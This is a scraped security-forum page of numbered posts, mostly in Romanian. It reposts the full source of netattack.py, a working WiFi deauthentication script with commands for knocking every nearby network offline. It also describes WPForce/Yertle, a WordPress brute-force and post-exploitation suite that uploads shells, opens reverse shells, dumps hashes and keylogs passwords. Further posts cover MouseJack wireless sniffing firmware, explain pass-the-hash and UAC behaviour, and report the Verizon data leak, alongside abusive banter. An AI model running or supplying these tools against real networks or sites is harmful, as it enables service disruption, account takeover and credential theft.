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  1. The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. The effectiveness and power of this script highly depends on your wireless card. NETATTACK 2 RELEASED https://github.com/chrizator/netattack2/ REQUIREMENTS Python 2.5+ (not Python 3+) Modules: scapy argparse sys OS threading logging iw(config) OFC LINUX USAGE EASY SCANNING FOR WIFI NETWORKS python netattack.py -scan -mon This example will perform a WiFi network scan. The BSSID, ESSID and the Channel will be listet in a table. -scan | --scan This parameter must be called when you want to do a scan. It's one of the main commands. It is searching for beacon frames that are sent by routers to notify there presence. -mon | --monitor By calling this parameter the script automatically detects you wireless card and puts it into monitoring mode to capture the ongoing traffic. If you know the name of your wireless card and it's already working in monitoring mode you can call -i This can be used instead of -mon. DEAUTHENTIFICATION ATTACK python netattack.py -deauth -b AB:CD:EF:GH:IJ:KL -u 12:34:56:78:91:23 -c 4 -mon This command will obviously perform a deauthentification attack. -deauth | --deauth This parameter is a main parameter as well as scan. It is necessary to call if you want to deauth attack a certain target. -b | --bssid With -b you select the AP's MAC-Address (BSSID). The -deauth parameter requires one or multiple BSSID's -u | --client If you don't want to attack the whole network, but a single user/client/device, you can do this with -u. It is not necessary. -c | --channel By adding this parameter, your deauthentification attack is going to be performed on the entered channel. The usage of -c is highly recommended since the attack will be a failure if the wrong channel is used. The channel of the AP can be seen by doing a WiFi scan (-scan). If you don't add -c the attack will take place on the current channel. The -mon or -i is necessary for this attack as well. DEAUTHENTIFICATION ATTACK ON EVERYBODY python netattack.py -deauthall -i [IFACE] When this command is called, the script automatically searches for AP in your area. After the search it start deauth-attacking all of the found AP's. The -deauthall parameter only needs an interface to get it working. ATTENTION: If you want all of this attacks to be as efficient as possible, have a look at the following "ADVANCED"-section ADVANCED -p | --packetburst This parameter is understood as the packetburst. Especially when you are targeting multiple AP's or even performing a -deauthall attack, the command is a must have. It defines the amount of deauth-packages to send after switching the target. When not adding the parameter it is going to be set to 64 by default. But that is highly unefficient if you are attacking 4+ AP's. -t | --timeout This parameter can be added to a -scan or -deauth. If it's added to the -scan parameter it defines the delay while switching the channel. It is set to 0.75s by default, so it is waiting 0.75s on each channel to collect beacon frames. If it's added to the -deauth parameter, it defines the delay between each packetburst. This can be used to decrease the intense of the attack or to attack the target(s) at a certain time. -cf | --channelformat This parameter can only be added to -scan. It shows a more detailed output while scanning. It's mainly recommended when the location changes and with it the AP's. Download netattack-master.zip Mirror: netattack.py #!/usr/bin/env python import sys import os import time import argparse from threading import Thread import logging logging.getLogger('scapy.runtime').setLevel(logging.ERROR) from scapy.all import * conf.verb = 0 W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange P = '\033[35m' # purple BOLD = '\033[1m' # bold THIN = '\033[1m' # normal # creating arguments def argument_parser(): parser = argparse.ArgumentParser(usage=''' '''+BOLD+'''SCAN NETWORKS:'''+THIN+O+''' -scan (Main command)'''+W+''' -i or -mon (Interfaces) -cf (More detailed output format) -t (Set channel switch delay) -nr (Don't do a rescan) '''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+''' -deauth (Main command)'''+W+''' -b (Add a BSSID) -u (Add a client) -i or -mon (Interfaces) -p (Change Packetburst) -t (set time Interval) '''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+''' -deauthall (Main command)'''+W+''' -i or -mon (Interfaces) -p (Packetburst)''') parser.add_argument('-mon', '--monitor', action='store_true', help='This activates the monitoring mode \ and automatically searches for your wlan device.') parser.add_argument('-scan', '--scan', action='store_true', help='This is one of the main parameters. \ It searches for all available WiFi-Networks. \ Other parameters can be added optionally.') parser.add_argument('-cf', '--channelformat', action='store_true', help='It activates the channelformat. \ It\'s kind of verbose layout of searching. \ Espacially useful if searching for 1 network.') parser.add_argument('-t', '--timeout', type=float, help='This is setting a delay. \ It can be used to add a delay to deauth \ or a delay for switching the channel while scanning. \ DEFAULT = 0.75') parser.add_argument('-nr', '--norescan', action='store_true', help='-nr can only be used with -scan. \ This deactivates multiple scans \ and stops when channel 14 is reached.') parser.add_argument('-deauth', '--deauth', action='store_true', help='This is one of the main parameters. \ It deauth-attacks a certain BSSID. \ Adding a client is optionally.') parser.add_argument('-deauthall', '--deauthall', action='store_true', help='This is one of the main parameters. \ It searches all the WiFi Networks near by \ and deauth-attacks them.') parser.add_argument('-b', '--bssid', nargs='*', help='With this you add a BSSID to a deauth. \ It\'s a necessary parameter for -deauth.') parser.add_argument('-a', '--amount', default=0, type=int, help='This is the amount of deauth-packages to be send. \ It can only be used with -deauth \ DEFAULT = infinite') parser.add_argument('-u', '--client', default='FF:FF:FF:FF:FF:FF', help='This adds a client to a deauth-attack. \ It can only be used with -deauth and is optionally.\ DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)') parser.add_argument('-c', '--channel', type=int, help='This adds a channel to a deauth-attack. \ It can only be used with -d. \ If there is no certain channel the current channel will be used.') parser.add_argument('-p', '--packetburst', type=int, default=64, help='This sets the amount of packets in one burst. \ It can only be used with -d \ DEFAULT = 64') parser.add_argument('-i', '--interface', help='This is a necessary parameter. \ It calls the monitoring interface. \ This parameter needs to be included everywhere.') return parser def throw_error(): # invalid arguments handling if not args.deauth and not args.scan and not args.deauthall and not args.monitor: argument_parser().print_usage() sys.exit(0) if not args.interface and not args.monitor: print('[' +R+ '-' +W+'] No interface selected.') sys.exit(0) if args.deauth and args.channelformat: print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.') sys.exit(0) if args.deauth and not args.bssid: print('[' +R+ '-' +W+'] Error. No BSSID selected.') sys.exit(0) if args.scan and args.packetburst != 64: print('[' +R+ '-' +W+'] Parameter -p not available when scanning.') if args.scan and args.amount: print('[' +R+ '-' +W+'] Parameter -a not available when scanning.') sys.exit(0) if args.scan and args.bssid: print('[' +R+ '-' +W+'] Parameter -b not available when scanning.') sys.exit(0) if args.scan and args.deauth: print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.') sys.exit(0) if args.deauth and args.norescan: print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.') if args.deauthall: if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan: print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall') if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF': if len(args.bssid) > 1: print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.') sys.exit(0) if args.interface and args.monitor: print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.') sys.exit(0) # # # # # # # # # # # # # # # # SCAN # # # # # # # # # # # # # # # # # handling the packages def pckt_handler(pckt): if pckt.haslayer(Dot11): #-> check if pckt type 802.11 if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame if pckt.addr2 not in APs: APs[pckt.addr2] = on_channel #-> add to APs dict output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out # printing found ap def output_aps(bssid, essid, channel): ch_space = 2 # leave different space for channel numbers if len(str(channel)) == 1: ch_space = 3 if args.channelformat: print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'') else: print(str(bssid).upper() + ' | ' + str(channel) + ' '*ch_space + '| ' + str(essid)) # hopping between wifi channels def channel_hop(): global on_channel timeout = 0.75 if args.timeout: timeout = args.timeout if not args.channelformat: print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n') print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W) while True: if on_channel > 14: if args.norescan: print('\nPress CTRL-C to quit...') sys.exit(0) elif not rescan: break else: on_channel = 1 if args.channelformat: print('\n--------------- RESCAN ---------------\n') continue if args.channelformat: print('[CHANNEL] ' + str(on_channel) + '/14') os.system('iwconfig ' + iface + ' channel ' + str(on_channel)) time.sleep(timeout) on_channel += 1 # # # # # # # # # # # # # # # # DEAUTH # # # # # # # # # # # # # # # # def set_channel(): channel = 4 if args.channel: channel = args.channel os.system('iwconfig ' + iface + ' channel ' + str(channel)) # creating and managing packets def deauth(args): bssid = args.bssid client = args.client amount = args.amount sleep = 0 endless = False if amount == 0: endless = True if args.timeout: sleep = args.timeout while endless: for ap in bssid: ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() if client != 'FF:FF:FF:FF:FF:FF': c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth() try: for x in range(args.packetburst): send(ap_c_pckt) if client != 'FF:FF:FF:FF:FF:FF': send(c_ap_pckt) print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap) time.sleep(sleep) except(KeyboardInterrupt): print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') sys.exit(0) while amount > 0 and not endless: for ap in bssid: ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() if client != 'FF:FF:FF:FF:FF:FF': c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth() try: for x in range(args.packetburst): send(ap_c_pckt) if client != 'FF:FF:FF:FF:FF:FF': send(c_ap_pckt) print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap) amount -= 1 time.sleep(sleep) except (KeyboardInterrupt): print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') sys.exit(0) print('[' +R+ '!' +W+ '] Finished successfully.') def deauth_all(): print('\n[' +O+ '*' +W+ '] Starting deauth...\n') while True: for ap in APs: for x in range(args.packetburst): try: ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth() os.system('iwconfig ' + iface + ' channel ' + str(APs[ap])) send(ap_c_pckt) except (KeyboardInterrupt): print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') sys.exit(0) print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper()) # # # # # # # # # # # # # # # # MONITOR # # # # # # # # # # # # # # # # def monitor_on(): ifaces = os.listdir('/sys/class/net/') status = False for iface in ifaces: if 'wlan' in iface: print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...') os.system('ifconfig ' + iface + ' down') os.system('iwconfig ' + iface + ' mode monitor') os.system('ifconfig ' + iface + ' up') print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface) status = True return iface if status == False: print('[' +R+ '-' +W+'] No interface found. Try it manually.') sys.exit(0) # # # # # # # # # # # # # # # # MAIN # # # # # # # # # # # # # # # # if __name__ == '__main__': print(P+'* * * * * * * * * * * * * * * * * *') print('* N E T A T T A C K by chrizator *') print('* * * * * * * * * * * * * * * * * *'+W) args = argument_parser().parse_args() APs = {} on_channel = 1 rescan = True throw_error() iface = None if args.interface: iface = args.interface if args.monitor: iface = monitor_on() conf.iface = iface #-> set scapy's interface ## SCAN ## if args.scan: # channel hopping thread hop_t = Thread(target=channel_hop, args=[]) hop_t.daemon = True hop_t.start() sniff(iface=iface, prn=pckt_handler, store=0) ## DEAUTH ## if args.deauth: set_channel() deauth(args) ## DEAUTHALL# if args.deauthall: rescan = False hop_t = Thread(target=channel_hop, args=[]) hop_t.daemon = True hop_t.start() sniff(iface=iface, prn=pckt_handler, store=0, timeout=13) deauth_all() Source: https://github.com/chrizator/netattack
    2 points
  2. Tu ai prea mult timp liber pentru ca , comentezi aiurea. Programarea nu se limiteaza la: "ce face ala si nu face alalalt?". O fi parerea ta, da' e proasta (IMHO, desigur). Taci acolo si vezi de treaba ta si joaca-te cu `aircrack-ng` daca nu poti sa accepti faptul ca unii oameni vor continua sa programeze ce vrea pula lor chiar daca 20 inaintea lor au facut fix acelasi lucru. Nu-mi bat capu' la ora asta mai mult. Meh, depinde de nivelul la care esti M-am uitat acum ceva ani pe sursa aia si...era cam haos asa cred ca ala o fost momentu' in care am zis: "bag pula-n el C, ma duc sa invat si altceva". Pentru cei interesati, sursa e aici
    2 points
  3. https://groups.google.com/forum/#!msg/rsua-ts2014/bsDNBH0MrcU/KQT26f0dzSYJ Translate message to English Some links are dead, sorry for that.
    2 points
  4. Cred ca este creat in scopuri educationale, in caz ca vrei sa vezi cum functioneaza tool-urile din aircrack. Bat la pariu ca este mult mai simplu sa citesti sursele alea in C, asta daca vrei sa stii ce fac tool-urile pe care le rulezi, sau mai bine zis tool-urile alea pentru care am Kali.iso . Putem pur si simplu sa ne limitam la : airmon-ng start wlan0, airodump-ng -i wlan0 --essid plm aircrack, aia e!
    1 point
  5. tutorial ardmax free )))))
    1 point
  6. About: WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules. For more information, visit the blog post here: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/ Features: Brute Force via API, not login form bypassing some forms of protection Can automatically upload an interactive shell Can be used to spawn a full featured reverse shell Dumps WordPress password hashes Can backdoor authentication function for plaintext password collection Inject BeEF hook into all pages Pivot to meterpreter if needed Install: Yertle requires the requests libary to run. http://docs.python-requests.org/en/master/user/install/ Usage: python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com" ,-~~-.___. __ __ ____ _____ / | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___ ( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \. \_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/ ==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___| / \-'~; || | / __/~| ...||__/|-" Brute Force Attack Tool for Wordpress =( _____||________| ~n00py~ Username List: usr.txt (3) Password List: pass.txt (21) URL: http://www[website].com -------------------------- [xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN -------------------------- -------------------------- [xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials! -------------------------- 100% Percent Complete All correct pairs: {'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'} -h, --help show this help message and exit -i INPUT, --input INPUT Input file name -w WORDLIST, --wordlist WORDLIST Wordlist file name -u URL, --url URL URL of target -v, --verbose Verbose output. Show the attemps as they happen. -t THREADS, --threads THREADS Determines the number of threads to be used, default is 10 -a AGENT, --agent AGENT Determines the user-agent -d, --debug This option is used for determining issues with the script. python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i _..---.--. __ __ _ _ .'\ __|/O.__) \ \ / /__ _ __| |_| | ___ /__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \. (____.'.-_\____) | | __/ | | |_| | __/ (_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___| (_..)--(.._)'--' ~n00py~ Post-exploitation Module for Wordpress Backdoor uploaded! Upload Directory: ebwhbas os-shell> -h, --help show this help message and exit -i, --interactive Interactive command shell -r, --reverse Reverse Shell -t TARGET, --target TARGET URL of target -u USERNAME, --username USERNAME Admin username -p PASSWORD, --password PASSWORD Admin password -li IP, --ip IP Listener IP -lp PORT, --port PORT Listener Port -v, --verbose Verbose output. -e EXISTING, --existing EXISTING Skips uploading a shell, and connects to existing shell Yertle currently contains these modules: Core Commands ============= Command Description ------- ----------- ? Help menu beef Injects a BeEF hook into website dbcreds Prints the database credentials exit Terminate the session hashdump Dumps all WordPress password hashes help Help menu keylogger Patches WordPress core to log plaintext credentials keylog Displays keylog file meterpreter Executes a PHP meterpreter stager to connect to metasploit quit Terminate the session shell Sends a TCP reverse shell to a netcat listener stealth Hides Yertle from the plugins page Download WPForce-master.zip Source: https://github.com/n00py/WPForce
    1 point
  7. Salut! Bine ai venit! Ai postat numai la help pana acum... Ai facut un post la fraiereala... Adica plm, chiar ne luati de fraieri??? Va plangeti ca niste pizde toata ziua, ca nu stiu cum a fost forumu', ca nu stiu cum a ajuns, ca nu stiu ce are comunitatea, dar nimeni nu face nimic, majoritatea arunca cu kkt, ca la asta se pricepe cel mai bine romanu'. "Make RST great again", "Sunt aici sa ajut" "Sunt aici pentru laba". Iti face placere sa faci parte din comunitatea asta, vrei sa inveti, vrei sa ajuti si sa-ti aduci aportul? Atunci fa-o in pula mea si nu ne mai ameninta atat cu tutoriale si frectii !!!
    1 point
  8. For information on the MouseJack vulnerabilities, please visit mousejack.com. Requirements SDCC (minimum version 3.1.0) GNU Binutils Python PyUSB platformio Install dependencies on Ubuntu: sudo apt-get install sdcc binutils python python-pip sudo pip install -U pip sudo pip install -U -I pyusb sudo pip install -U platformio Supported Hardware The following hardware has been tested and is known to work. CrazyRadio PA USB dongle SparkFun nRF24LU1+ breakout board Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based) Initialize the submodule git submodule init git submodule update Build the firmware cd nrf-research-firmware make Flash over USB nRF24LU1+ chips come with a factory programmed bootloader occupying the topmost 2KB of flash memory. The CrazyRadio firmware and RFStorm research firmware support USB commands to enter the Nordic bootloader. Dongles and breakout boards can be programmed over USB if they are running one of the following firmwares: Nordic Semiconductor Bootloader CrazyRadio Firmware RFStorm Research Firmware To flash the firmware over USB: cd nrf-research-firmware sudo make install Flash a Logitech Unifying dongle The most common Unifying dongles are based on the nRF24LU1+, but some use chips from Texas Instruments. This firmware is only supported on the nRF24LU1+ variants, which have a model number of C-U0007. The flashing script will automatically detect which type of dongle is plugged in, and will only attempt to flash the nRF24LU1+ variants. To flash the firmware over USB onto a Logitech Unifying dongle: cd nrf-research-firmware sudo make logitech_install Flash a Logitech Unifying dongle back to the original firmware Download and extract the Logitech firmware image, which will be named RQR_012_005_00028.hex or similar. Then, run the following command to flash the Logitech firmware onto the dongle: cd nrf-research-firmware sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex] Flash over SPI using a Teensy If your dongle or breakout board is bricked, you can alternatively program it over SPI using a Teensy. This has only been tested with a Teensy 3.1/3.2, but is likely to work with other Arduino variants as well. Build and Upload the Teensy Flasher cd nrf-research-firmware/prog platformio run --project-dir teensy-flasher --target upload Connect the Teensy to the nRF24LU1+ Teensy CrazyRadio PA Sparkfun nRF24LU1+ Breakout 9 GND 8 3 RESET 9 2 PROG 10 10 P0.3 11 6 P0.1 8 P0.2 13 4 P0.0 3.3V 5 VIN Flash the nRF24LU1+ cd nrf-research-firmware sudo make spi_install Python Scripts: scanner Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets. usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL] optional arguments: -h, --help show this help message and exit -c N [N ...], --channels N [N ...] RF channels -v, --verbose Enable verbose output -l, --lna Enable the LNA (for CrazyRadio PA dongles) -p PREFIX, --prefix PREFIX Promiscuous mode address prefix -d DWELL, --dwell DWELL Dwell time per channel, in milliseconds Scan for devices on channels 1-5 ./nrf24-scanner.py -c {1..5} Scan for devices with an address starting in 0xA9 on all channels cd nrf-research-firmware ./nrf24-scanner.py -p A9 sniffer Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] optional arguments: -h, --help show this help message and exit -c N [N ...], --channels N [N ...] RF channels -v, --verbose Enable verbose output -l, --lna Enable the LNA (for CrazyRadio PA dongles) -a ADDRESS, --address ADDRESS Address to sniff, following as it changes channels -t TIMEOUT, --timeout TIMEOUT Channel timeout, in milliseconds -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250 -r RETRIES, --retries RETRIES Auto retry limit, accepts [0,15] Sniff packets from address 61:49:66:82:03 on all channels cd nrf-research-firmware ./nrf24-sniffer.py -a 61:49:66:82:03 network mapper Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list. usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES] optional arguments: -h, --help show this help message and exit -c N [N ...], --channels N [N ...] RF channels -v, --verbose Enable verbose output -l, --lna Enable the LNA (for CrazyRadio PA dongles) -a ADDRESS, --address ADDRESS Known address -p PASSES, --passes PASSES Number of passes (default 2) -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT ACK timeout in microseconds, accepts [250,4000], step 250 -r RETRIES, --retries RETRIES Auto retry limit, accepts [0,15] Map the star network that address 61:49:66:82:03 belongs to cd nrf-research-firmware ./nrf24-network-mapper.py -a 61:49:66:82:03 continuous tone test The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels. This script will cause the transceiver to transmit a tone on the first channel that is passed in. usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l] optional arguments: -h, --help show this help message and exit -c N [N ...], --channels N [N ...] RF channels -v, --verbose Enable verbose output -l, --lna Enable the LNA (for CrazyRadio PA dongles) Transmit a continuous tone at 2405MHz cd nrf-research-firmware ./nrf24-continuous-tone-test.py -c 5 Download mousejack-master.zip Sources: https://github.com/BastilleResearch/mousejack http://www.mousejack.com/
    1 point
  9. Salut, Imi pare bine ca am gasit acest forum.. de multa vreme ma intrebam unde as putea gasi o comunitate de oameni pasionati de securitate cu care sa pot schimba idei. Mersi Alex de recomandare ! Am 29 de ani, lucrez in IT ca administrator pt diverse sisteme, si pe langa asta fac un Master in IT Security la Facultatea de Stiinte Aplicate Technikum din Vienna (am terminat primul an). Am copilarit printre "hackeri", iar in timpul liceului eram script kiddie, imi placea sa le fac farse vecinilor/colegilor, etc.. dar nu vreau sa intru in detalii, ca poate citeste vreunul.. Dupa liceu visul meu era sa ma fac Database Administrator si am invatat domeniul asta calumea, dar apoi m-am plictisit de el. De vreo 3 ani la munca dupa un proiect de securitate in care a trebuit sa schimbam toate sistemele ca sa fie conforme cu anumite standarde de securitate, mi-am dat seama cat de fain e domeniul securitatii si am inceput sa invat in special de pe cybrary, apoi m-am bagat la master pt ca mi-am dat seama ca am nevoie de cineva care sa ma indrume ce anume sa invat.. Datorita cursurilor de la facultate si a cursurilor de pe cybrary si HackingDojo (nu recomand), am invatat un pic de hacking: Web (xss, csrf, SQL injection, RCE, LFI, path traversal), OS/App: buffer overflows, DLL hijacking, DLL forwarding, information gathering, Privilege escalation, Kerberos hacking, creare de module metasploit. Dar de fapt nu ma intereseaza asa de tare sa invat hacking, vreau doar sa stiu ce e posibil...care sunt tehnicile de hacking. Sunt alte domenii din securitate care ma intereseaza mai tare.. Criptografie, Securitatea Protocoalelor: TLS, DNSSEC, IPSEC, protocoale de autentificare si autorizare, Security Detection and Defense...etc.. Programare : C#- destul de bine, python - mediocru, Ruby, Java- ma descurc.
    1 point
  10. Verizon, the major telecommunications provider, has suffered a data security breach with over 14 million US customers' personal details exposed on the Internet after NICE Systems, a third-party vendor, mistakenly left the sensitive users’ details open on a server. Chris Vickery, researcher and director of cyber risk research at security firm UpGuard, discovered the exposed data on an unprotected Amazon S3 cloud server that was fully downloadable and configured to allow public access. The exposed data includes sensitive information of millions of customers, including their names, phone numbers, and account PINs (personal identification numbers), which is enough for anyone to access an individual's account, even if the account is protected by two-factor authentication. NICE Systems is an Israel-based company that is known for offering wide-range of solutions for intelligence agencies, including telephone voice recording, data security, and surveillance. According to the researcher, it is unknown that why Verizon has allowed a 3rd party company to collect call details of its users, however, it appears that NICE Systems monitors the efficiency of its call-center operators for Verizon. The exposed data contained records of customers who called the Verizon's customer services in the past 6 months, which are recorded, obtained and analyzed by NICE. Interestingly, the leaked data on the server also indicates that NICE Systems has a partnership with Paris-based popular telecommunication company "Orange," for which it also collects customer details across Europe and Africa. Vickery had privately informed Verizon team about the exposure in late June, and the data was then secured within a week. Vickery is a reputed researcher, who has previously tracked down many exposed datasets on the Internet. Just last month, he discovered an unsecured Amazon S3 server owned by data analytics firm Deep Root Analytics (DRA), which exposed information of more than 198 Million United States citizens, that's over 60% of the US population. In March this year, Vickery discovered a cache of 60,000 documents from a US military project for the National Geospatial-Intelligence Agency (NGA) which was also left unsecured on Amazon cloud storage server for anyone to access. In the same month, the researcher also discovered an unsecured and publicly exposed database, containing nearly 1.4 Billion user records, linked to River City Media (RCM). In 2015, Vickery also reported a huge cache of more than 191 Million US voter records and details of as many as 13 Million MacKeeper users. Via thehackernews.com
    1 point
  11. Salut Radu, Desigur, te ajutam cu placere daca ne raspunzi la urmatoarele intrebari: - ce e aia flood? - ce e aia domeniu DDoS? - care este diferenta dintre cei doi termeni de mai sus? - ce vrei sa faci mai exact? - de ce vrei sa faci asta? - esti metinar? - crezi ca rezolvi ceva facand asta? Uite, din partea celor care inteleg divinitatea absoluta si astralul concurential: .-. .-. |U| | | | | | | | | | | _| |_ _| |_ | | | |-. | |_| |-. /| ` | / )| |_|_| | | | | |-' `-^-' | | | || | \ / \ ' / | | | | | | | | Cu stima, eu
    1 point
  12. Conversatie la un alt nivel pe semi-comunitatea noastra de IT-isti. Sfanta evanghelie trebuie propovaduita si aici http://sprunge.us/JNjG
    1 point
  13. WillFollow Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io Mar 16 Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy Nearly three years ago, I wrote a post named “Pass-the-Hash is Dead: Long Live Pass-the-Hash” that detailed some operational implications of Microsoft’s KB2871997 patch. A specific sentence in the security advisory, “Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machine using local accounts…” led me to believe (for the last 3 years) that the patch modified Windows 7 and Server 2008 behavior to prevent the ability to pass-the-hash with non-RID 500 local administrator accounts. My colleague Lee Christensen recently pointed out that this was actually incorrect, despite Microsoft’s wording, and that the situation is more nuanced than we initially believed. It’s worth noting that pwnag3’s seminal “What Did Microsoft Just Break with KB2871997 and KB2928120” article also suffers from the same misunderstandings that my initial post did. We now have a better understanding of these topics and wanted to set the record straight as best we could. This is my mea culpa for finally realizing that KB2871997, in the majority of situations, had absolutely nothing to do with stopping “complicating” the use of pass-the-hash in Windows enterprises. Apologies for preaching the incorrect message for nearly 3 years- I hope to atone for my sins :) And as always, if there are errors in this post, please let me know and I will update! Clarifying KB2871997 So what did this patch actually do if it didn’t automatically “prevent network logon and remote interactive logon to domain-joined machines using local accounts”? As Aaron Margosis describes, the patch introduced, among many other changes, two new security identifiers (SIDs): S-1–5–113 (NT AUTHORITY\Local account) and S-1–5–114 (NT AUTHORITY\Local account and member of Administrators group). As detailed in the Microsoft article, these SIDs can be used through group policy to effectively block the use of all local administrative accounts for remote logon. Note that while KB2871997 backported these SIDs to Windows 7 and Server 2008/2012, they were incorporated by default in the Windows operating system from Windows 8.1 and Server 2012 R2+. This is something that Sean Metcalf has previously mentioned and Aaron specifically clarified in the comments of that Microsoft post. Sidenote: Luckily for us, this also means that any user authenticated on the domain can enumerate these policies and see what machines have these restrictions set. I’ll cover how to perform this type of enumeration and correlation in a future post. I assumed, incorrectly, that this patch modified existing behavior on Windows 7 machines. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500 Administrator (in most situations, see more below). Here we can see that KB2871997 is not installed on a basic Windows 7 install: Yet executing pass-the-hash with the ‘admin’ non-RID 500 account that’s a member of local Administrators fails: So this behavior existed even before the KB2871997 release. Part of this confusion was due to the language used in the security advisory, but I take responsibility for not testing the situation fully and relaying the correct information. While we do highly recommend Aaron’s recommendations of deploying GPOs with these new SIDs to help mitigate lateral spread, we also reserve the right to still smirk at the KB’s original title ;) http://www.infosecisland.com/blogview/23787-Windows-Update-to-Fix-Pass-the-Hash-Vulnerability-Not.html Remote Access and User Account Control So if the patch isn’t affecting this behavior, what is preventing us from using pass-the-hash with local admin accounts? And why does the RID 500 account operate as a special case? Adding to that, why are domain accounts that are members of local administrators exempt from this blocking behavior as well? Also, over the past several years we’ve also noticed on some engagements that pass-the-hash will still work with non-RID 500 local admin accounts, despite the patch being applied. This behavior always bugged us but we think we can finally explain all these inconsistencies. The actual culprit for all these questions is user account control (UAC) token filtering in the context of remote access. I always thought of UAC solely in the context of local host actions but there are various implications for remote situations as well. The ”User Account Control and Remote Scenarios” section of the Microsoft “Windows Vista Application Development Requirements for User Account Control Compatibility” document and “Description of User Account Control and remote restrictions in Windows Vista” post both explain a lot of this behavior, and clarified several points for me personally. Tl;dr for any non-RID 500 local admin account remotely connecting to a Windows Vista+ machine, whether through WMI, PSEXEC, or other methods, the token returned is “filtered” (i.e. medium integrity) even though the user is a local administrator. Since there isn’t a method to remotely escalate to a high-integrity context, except through RDP (which needs a plaintext password unless ‘Restricted Admin’ mode is enabled) the token remains medium integrity. So when the user attempts to access a privileged resource remotely, e.g. ADMIN$, they receive an “Access is Denied” message despite technically having administrative access. I’ll get to the RID 500 exception in a bit ;) For local user accounts in a local “Administrators” group, the “Windows Vista Application Development Requirements for User Account Control Compatibility” document describes the following behavior: When a user with an administrator account in a Windows Vista computer’s local Security Accounts Manager (SAM) database remotely connects to a Windows Vista computer, the user has no elevation potential on the remote computer and cannot perform administrative tasks. Microsoft’s “Description of User Account Control and remote restrictions in Windows Vista” post describes this in another way: When a user who is a member of the local administrators group on the target remote computer establishes a remote administrative connection…they will not connect as a full administrator. The user has no elevation potential on the remote 